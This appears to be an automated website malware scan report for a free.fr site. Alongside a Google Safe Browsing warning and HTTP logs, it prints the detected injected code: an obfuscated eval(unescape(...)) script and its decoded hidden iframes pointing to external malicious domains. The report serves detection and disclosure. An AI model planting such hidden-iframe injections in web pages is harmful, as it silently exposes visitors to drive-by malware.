Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ali59000.free.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ali59000.free.fr/ | 200 OK Content-Length: 3690 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%76%62%2E%63%6F%6D%2F%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29')); Decoded script: document.write('<iframe src="http://sedvb.com/" width=1 height=1></iframe>') document.write('<iframe src="http://sedvb.com/" width=1 height=1></iframe>') <iframe src="http://sedvb.com/" width=1 height=1></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://db3service.ru/in.php?a=qqkfbwqeaaadbgagekcjbqceaqmabqeedq== <iframe src="http://db3service.ru/in.php?a=qqkfbwqeaaadbgagekcjbqceaqmabqeedq==" width="0" height="0" frameborder="0"> | ||
http://ciecieblachy.pl/images/indexxcvy.php | 404 Not Found Content-Length: 25 Content-Type: text/html | clean |
http://ciecieblachy.pl/test404page.js | HTTP/1.1 301 Moved Permamently Connection: close Date: Sat, 17 Jan 2015 16:42:42 GMT Location: http://www.ciecieblachy.pl Server: nginx/1.3.4 Content-Type: text/html X-Frame-Options: SAMEORIGIN | clean |
http://www.ciecieblachy.pl/ | HTTP/1.1 301 Moved Permamently Connection: close Date: Sat, 17 Jan 2015 16:42:43 GMT Location: http://blachytrapezowe.pl Server: nginx/1.3.4 Content-Type: text/html X-Frame-Options: SAMEORIGIN | clean |
http://blachytrapezowe.pl/ | 200 OK Content-Length: 9828 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.8.3.min.js | 200 OK Content-Length: 93636 Content-Type: application/x-javascript | clean |
http://code.jquery.com/ui/1.10.3/jquery-ui.js | 200 OK Content-Length: 301184 Content-Type: application/x-javascript | clean |
http://blachytrapezowe.pl/assets/js/home/modernizr.js | 200 OK Content-Length: 9879 Content-Type: application/javascript | clean |
http://blachytrapezowe.pl/assets/js/home/owl.carousel.js | 200 OK Content-Length: 37545 Content-Type: application/javascript | clean |
http://blachytrapezowe.pl/assets/js/home/responsee.js | 200 OK Content-Length: 12704 Content-Type: application/javascript | clean |
http://blachytrapezowe.pl/assets/js/home/whcookies.js | 200 OK Content-Length: 2053 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ali59000.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 16:42:41 GMT
Accept-Ranges: bytes
ETag: "1304e34-e6a-4dd83cb3"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 3690
Content-Type: text/html
Last-Modified: Sat, 21 May 2011 22:29:07 GMT
...3690 bytes of data.
GET / HTTP/1.1
Host: ali59000.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 16:42:41 GMT
Accept-Ranges: bytes
ETag: "1304e34-e6a-4dd83cb3"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 3690
Content-Type: text/html
Last-Modified: Sat, 21 May 2011 22:29:07 GMT
...3690 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ali59000.free.fr
Referer: http://www.google.com/search?q=ali59000.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ali59000.free.fr
Referer: http://www.google.com/search?q=ali59000.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.